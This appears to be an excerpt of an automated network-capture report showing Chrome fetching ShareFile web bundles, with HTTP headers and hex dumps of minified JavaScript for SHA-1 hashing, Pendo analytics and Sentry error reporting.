                                                                                                                                                                                                                                                                                Data Ascii: [n>>2]|=(224|t>>12)<<u[3&n++]:(t=65536+((1023&t)<<10|1023&e.charCodeAt(++r)),a[n>>2]|=(240|t>>18)<<u[3&n++],a[n>>2]|=(128|t>>12&63)<<u[3&n++]),a[n>>2]|=(128|t>>6&63)<<u[3&n++]),a[n>>2]|=(128|63&t)<<u[3&n++]);this.lastByteIndex=n,this.bytes+=n-this.start,6
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 31 30 30 30 0d 0a 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 74 68 69 73 2e 68 30 2c 6e 3d 74 68 69 73 2e 68 31 2c 69 3d 74 68 69 73 2e 68 32 2c 72 3d 74 68 69 73 2e 68 33 2c 6f 3d 74 68 69 73 2e 68 34 2c 61 3d 74 68 69 73 2e 62 6c 6f 63 6b 73 2c 73 3d 31 36 3b 73 3c 38 30 3b 2b 2b 73 29 65 3d 61 5b 73 2d 33 5d 5e 61 5b 73 2d 38 5d 5e 61 5b 73 2d 31 34 5d 5e 61 5b 73 2d 31 36 5d 2c 61 5b 73 5d 3d 65 3c 3c 31 7c 65 3e 3e 3e 33 31 3b 66 6f 72 28 73 3d 30 3b 73 3c 32 30 3b 73 2b 3d 35 29 74 3d 28 65 3d 28 6e 3d 28 65 3d 28 69 3d 28 65 3d 28 72 3d 28 65 3d 28 6f 3d 28 65 3d 74 3c 3c 35 7c 74 3e 3e 3e 32 37 29 2b 28 6e 26 69 7c 7e 6e 26 72 29 2b 6f 2b 31 35 31 38 35 30 30 32 34 39 2b 61 5b 73 5d 3c 3c 30 29 3c 3c 35 7c 6f 3e 3e 3e 32 37 29 2b 28 74 26 28
                                                                                                                                                                                                                                                                                Data Ascii: 1000n(){for(var e,t=this.h0,n=this.h1,i=this.h2,r=this.h3,o=this.h4,a=this.blocks,s=16;s<80;++s)e=a[s-3]^a[s-8]^a[s-14]^a[s-16],a[s]=e<<1|e>>>31;for(s=0;s<20;s+=5)t=(e=(n=(e=(i=(e=(r=(e=(o=(e=t<<5|t>>>27)+(n&i|~n&r)+o+1518500249+a[s]<<0)<<5|o>>>27)+(t&(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 5e 28 6f 3d 6f 3c 3c 33 30 7c 6f 3e 3e 3e 32 29 5e 74 29 2b 6e 2d 38 39 39 34 39 37 35 31 34 2b 61 5b 73 2b 33 5d 3c 3c 30 29 3c 3c 35 7c 6e 3e 3e 3e 32 37 29 2b 28 69 5e 28 72 3d 72 3c 3c 33 30 7c 72 3e 3e 3e 32 29 5e 6f 29 2b 74 2d 38 39 39 34 39 37 35 31 34 2b 61 5b 73 2b 34 5d 3c 3c 30 2c 69 3d 69 3c 3c 33 30 7c 69 3e 3e 3e 32 3b 74 68 69 73 2e 68 30 3d 74 68 69 73 2e 68 30 2b 74 3c 3c 30 2c 74 68 69 73 2e 68 31 3d 74 68 69 73 2e 68 31 2b 6e 3c 3c 30 2c 74 68 69 73 2e 68 32 3d 74 68 69 73 2e 68 32 2b 69 3c 3c 30 2c 74 68 69 73 2e 68 33 3d 74 68 69 73 2e 68 33 2b 72 3c 3c 30 2c 74 68 69 73 2e 68 34 3d 74 68 69 73 2e 68 34 2b 6f 3c 3c 30 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 68 65 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 66 69 6e 61 6c
                                                                                                                                                                                                                                                                                Data Ascii: ^(o=o<<30|o>>>2)^t)+n-899497514+a[s+3]<<0)<<5|n>>>27)+(i^(r=r<<30|r>>>2)^o)+t-899497514+a[s+4]<<0,i=i<<30|i>>>2;this.h0=this.h0+t<<0,this.h1=this.h1+n<<0,this.h2=this.h2+i<<0,this.h3=this.h3+r<<0,this.h4=this.h4+o<<0},l.prototype.hex=function(){this.final
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1324INData Raw: 74 29 2c 74 2e 65 78 70 6f 72 74 73 29 2c 4c 3d 65 28 69 29 2c 72 2c 6f 3d 7b 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 72 65 61 74 65 48 54 4d 4c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 78 65 28 65 29 7b 72 65 74 75 72 6e 20 72 7c 7c 28 72 3d 65 2e 74 72 75 73 74 65 64 54 79 70 65 73 50 6f 6c 69 63 79 7c 7c 28 48 62 2e 74 72 75 73 74 65 64 54 79 70 65 73 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 48 62 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 3f 48 62 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 70 65 6e 64 6f 22 2c 6f 29 3a 6f
                                                                                                                                                                                                                                                                                Data Ascii: t),t.exports),L=e(i),r,o={createScriptURL:function(e){return e},createHTML:function(e){return e}};function xe(e){return r||(r=e.trustedTypesPolicy||(Hb.trustedTypes&&"function"==typeof Hb.trustedTypes.createPolicy?Hb.trustedTypes.createPolicy("pendo",o):o
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 31 30 30 30 0d 0a 24 22 29 3a 73 29 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 26 26 73 2e 74 65 73 74 28 74 2e 68 6f 73 74 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 29 7b 72 65 74 75 72 6e 20 52 2e 75 69 6e 74 38 54 6f 42 61 73 65 36 34 28 4c 2e 63 72 65 61 74 65 28 29 2e 75 70 64 61 74 65 28 65 29 2e 64 69 67 65 73 74 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 73 74 61 67 69 6e 67 41 67 65 6e 74 55 72 6c 26 26 65 5b 6b 5d 7d 66 75 6e 63 74 69 6f 6e 20 57 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 73 74 61 67 69 6e 67 41 67 65 6e 74 55 72 6c 26 26 65 2e 73 74 61 67 69 6e 67 53 65 72 76 65 72 73 7d 76 61 72 20 4b 3d 5b 22 69 6e 69 74 69 61 6c
                                                                                                                                                                                                                                                                                Data Ascii: 1000$"):s)instanceof RegExp&&s.test(t.host))return!0}return!1}function H(e){return R.uint8ToBase64(L.create().update(e).digest())}function j(e){return e&&e.stagingAgentUrl&&e[k]}function W(e){return e&&e.stagingAgentUrl&&e.stagingServers}var K=["initial
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1390INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 73 65 6c 66 3d 3d 3d 73 65 6c 66 26 26 73 65 6c 66 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 42 74 26 26 42 74 2e 67 6c 6f 62 61 6c 3d 3d 3d 42 74 26 26 42 74 7c 7c 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7c 7c 7b 7d 2c 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2c 46 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 44 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3a 6e 75 6c 6c 2c 47 3d 69 2e 70 75 73 68 2c 75 3d 69
                                                                                                                                                                                                                                                                                Data Ascii: !function(){var e;e=function(){var e="object"==typeof self&&self.self===self&&self||"object"==typeof Bt&&Bt.global===Bt&&Bt||Function("return this")()||{},i=Array.prototype,F=Object.prototype,D="undefined"!=typeof Symbol?Symbol.prototype:null,G=i.push,u=i
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1324INData Raw: 2e 64 6f 63 75 6d 65 6e 74 26 26 65 2e 64 6f 63 75 6d 65 6e 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 66 3d 61 3d 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 2f 2e 2f 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 49 6e 74 38 41 72 72 61 79 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 21 31 7d 3a 61 2c 65 3d 72 28 22 4f 62 6a 65 63 74 22 29 2c 72 65 3d 6e 26 26 65 28 6e 65 77 20 44 61 74 61 56 69 65 77 28 6e 65 77 20 41 72 72 61 79 42 75 66 66 65 72 28 38 29 29 29 2c 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4d 61 70 26 26 65 28 6e 65 77 20 4d 61 70 29 2c 6e 3d 72 28 22 44
                                                                                                                                                                                                                                                                                Data Ascii: .document&&e.document.childNodes,f=a="function"!=typeof/./&&"object"!=typeof Int8Array&&"function"!=typeof e?function(e){return"function"==typeof e||!1}:a,e=r("Object"),re=n&&e(new DataView(new ArrayBuffer(8))),a="undefined"!=typeof Map&&e(new Map),n=r("D


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                14192.168.2.64973313.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1243OUTGET /bundles/7ba6967109e88a8ecd8d.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 5339
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=dB73LwxwncMoCUdGD6NiMuWaVSN50RyAXNQUs9MJfjQI2QJ3to+yVIEI0PZDffI++AKe89d8EVYVhSjdotZ6qT3zwLpwMBwBx4dLwU6Bo58hXF/+5awy7IvBeCukKKeQyU/N6EmSFj4Ni4j3p4kdkbWkfkDGp1Pej7FeQVs3GfWh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=dB73LwxwncMoCUdGD6NiMuWaVSN50RyAXNQUs9MJfjQI2QJ3to+yVIEI0PZDffI++AKe89d8EVYVhSjdotZ6qT3zwLpwMBwBx4dLwU6Bo58hXF/+5awy7IvBeCukKKeQyU/N6EmSFj4Ni4j3p4kdkbWkfkDGp1Pej7FeQVs3GfWh; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=zVUMwXhHWhUGXj9/FLfMgTrjLzl9dlMTFSuU5E1+duNxBi/5Yv1W7hsZ9sHAEs27netS9ZDxCaO0Zu0rtXVHOWeJtXNibMACG+x2KitFwvV6mx+jhVb4nMAmatD+; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=zVUMwXhHWhUGXj9/FLfMgTrjLzl9dlMTFSuU5E1+duNxBi/5Yv1W7hsZ9sHAEs27netS9ZDxCaO0Zu0rtXVHOWeJtXNibMACG+x2KitFwvV6mx+jhVb4nMAmatD+; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a8c33db"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC5339INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 38 36 33 5d 2c 7b 36 36 35 33 33 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 6f 29 7b 76 61 72 20 65 3d 6f 28 38 30 38 31 29 2c 66 3d 6f 28 32 33 36 34 35 29 2c 72 3d 6f 28 36 31 36 36 37 29 2c 69 3d 6f 28 34 34 35 35 30 29 2c 61 3d 6f 28 31 37 39 37 29 2c 73 3d 6f 28 38 35 34 39 33 29 2c 63 3d 6f 28 36 36 34 30 36 29 2c 6c 3d 6f 28 32 36 30 38 32 29 2c 70 3d 6f 28 34 34 30 39 33 29 2c 75 3d 6f 28 33 35 37 31 35 29 2c 64
                                                                                                                                                                                                                                                                                Data Ascii: (self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1863],{66533:function(n,t,o){var e=o(8081),f=o(23645),r=o(61667),i=o(44550),a=o(1797),s=o(85493),c=o(66406),l=o(26082),p=o(44093),u=o(35715),d


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                15192.168.2.64973213.248.193.2514432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1243OUTGET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/public/share/web-189361297164461c
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: AWSALBTG=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALBTGCORS=QLTdl45Z4cz91kT5blPsbomeD2BQuBoRPvySJTbUekf2djj4k2bYQp1dHmNbGGFUiMjGTUyywcUgazyn+JTUwLNPvpQEKIZD9oCKMuV/9D/rpFQqlN9Wj5J2PuzlCIDKidVzgJPW5HZTQtus/AjTHQRI1Is3jO2onEVXoCBkyrdh; AWSALB=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW; AWSALBCORS=O14EaRxtctlvJ/AZjmizBfq3jf937SyamRz27awUXA1wt3w82Qp1b5tF+SGnC2p3JxCfCuHCJlQRLgKTP2Pp1sOlSbM/PxFmvC1Mlv+qkes72yTFALJx26N7r7EW
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC1431INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:11 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 310527
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTG=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBTGCORS=zqYjAjHLfmVRcfIFxuueIGROo469AAXVoDwNA+xtHvAkdxVdCaJD0sSaMaCXoEihiZMgXyHVv35hCZdb7JSTo74PMem6xAUfhMAKCO7+yucoST10f8eV8Q9RWueNlnqbgVwEv2Lp4ZQPBsQWs57Qbs54x+U3UaavsCz3S+IXBIfR; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALB=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/
                                                                                                                                                                                                                                                                                Set-Cookie: AWSALBCORS=EDLmDV8hCsbRGCTtXo43ZQn446NWQyTf7b7biDcCGEz0N7IF1p/dUwpTMkhLZxhOWnYtsS6rNxHYfZT7lpdjaoac59gKpD40PnFo7g/PlN9ExJ+fJDnpQwZ/GjYJ; Expires=Wed, 16 Oct 2024 18:05:11 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                ETag: "1db18773a889bff"
                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 07 Oct 2024 05:10:30 GMT
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC8459INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 36 30 5d 2c 7b 33 31 33 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 72 65 61 64 63 72 75 6d 62 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 6f 7d 2c 42 72 6f 77 73 65 72 43 6c 69 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 73 7d 2c 42 72 6f 77 73 65 72 50 72 6f 66 69 6c 69 6e 67
                                                                                                                                                                                                                                                                                Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1360],{31360:function(t,e,n){n.r(e),n.d(e,{Breadcrumbs:function(){return Do},BrowserClient:function(){return As},BrowserProfiling
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 7b 74 3d 21 31 7d 2c 69 73 45 6e 61 62 6c 65 64 3a 28 29 3d 3e 74 7d 3b 72 65 74 75 72 6e 20 4d 3f 4f 2e 66 6f 72 45 61 63 68 28 28 6e 3d 3e 7b 65 5b 6e 5d 3d 28 2e 2e 2e 65 29 3d 3e 7b 74 26 26 44 28 28 28 29 3d 3e 7b 62 2e 63 6f 6e 73 6f 6c 65 5b 6e 5d 28 60 53 65 6e 74 72 79 20 4c 6f 67 67 65 72 20 5b 24 7b 6e 7d 5d 3a 60 2c 2e 2e 2e 65 29 7d 29 29 7d 7d 29 29 3a 4f 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 65 5b 74 5d 3d 28 29 3d 3e 7b 7d 7d 29 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 74 2c 65 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 65 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 65 3f 74 3a 60 24 7b 74 2e 73 6c 69 63 65 28 30 2c 65 29 7d 2e 2e 2e 60 7d 66 75 6e 63 74 69 6f 6e 20 50 28
                                                                                                                                                                                                                                                                                Data Ascii: {t=!1},isEnabled:()=>t};return M?O.forEach((n=>{e[n]=(...e)=>{t&&D((()=>{b.console[n](`Sentry Logger [${n}]:`,...e)}))}})):O.forEach((t=>{e[t]=()=>{}})),e}();function L(t,e=0){return"string"!=typeof t||0===e||t.length<=e?t:`${t.slice(0,e)}...`}function P(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 3b 69 66 28 21 74 68 69 73 2e 5f 63 6c 69 65 6e 74 29 72 65 74 75 72 6e 20 4e 2e 77 61 72 6e 28 22 4e 6f 20 63 6c 69 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 63 6f 70 65 20 2d 20 77 69 6c 6c 20 6e 6f 74 20 63 61 70 74 75 72 65 20 65 78 63 65 70 74 69 6f 6e 21 22 29 2c 6e 3b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 45 72 72 6f 72 28 22 53 65 6e 74 72 79 20 73 79 6e 74 68 65 74 69 63 45 78 63 65 70 74 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 63 6c 69 65 6e 74 2e 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 28 74 2c 7b 6f 72 69 67 69 6e 61 6c 45 78 63 65 70 74 69 6f 6e 3a 74 2c 73 79 6e 74 68 65 74 69 63 45 78 63 65 70 74 69 6f 6e 3a 72 2c 2e 2e 2e 65 2c 65 76 65 6e 74 5f 69 64 3a 6e 7d 2c 74 68 69 73 29 2c 6e 7d 63 61 70 74 75
                                                                                                                                                                                                                                                                                Data Ascii: ;if(!this._client)return N.warn("No client configured on scope - will not capture exception!"),n;const r=new Error("Sentry syntheticException");return this._client.captureException(t,{originalException:t,syntheticException:r,...e,event_id:n},this),n}captu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:11 UTC16384INData Raw: 68 65 64 20 62 79 20 5c 60 69 67 6e 6f 72 65 45 72 72 6f 72 73 5c 60 20 6f 70 74 69 6f 6e 2e 5c 6e 45 76 65 6e 74 3a 20 24 7b 5a 28 74 29 7d 60 29 2c 21 30 3b 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 22 74 72 61 6e 73 61 63 74 69 6f 6e 22 21 3d 3d 74 2e 74 79 70 65 7c 7c 21 65 7c 7c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6e 3d 74 2e 74 72 61 6e 73 61 63 74 69 6f 6e 3b 72 65 74 75 72 6e 21 21 6e 26 26 46 28 6e 2c 65 29 7d 28 74 2c 65 2e 69 67 6e 6f 72 65 54 72 61 6e 73 61 63 74 69 6f 6e 73 29 29 72 65 74 75 72 6e 20 4b 26 26 4e 2e 77 61 72 6e 28 60 45 76 65 6e 74 20 64 72 6f 70 70 65 64 20 64 75 65 20 74 6f 20 62 65 69 6e 67 20 6d 61 74 63 68 65 64 20 62 79 20 5c 60 69 67 6e 6f 72 65 54 72 61 6e 73 61
                                                                                                                                                                                                                                                                                Data Ascii: hed by \`ignoreErrors\` option.\nEvent: ${Z(t)}`),!0;if(function(t,e){if("transaction"!==t.type||!e||!e.length)return!1;const n=t.transaction;return!!n&&F(n,e)}(t,e.ignoreTransactions))return K&&N.warn(`Event dropped due to being matched by \`ignoreTransa
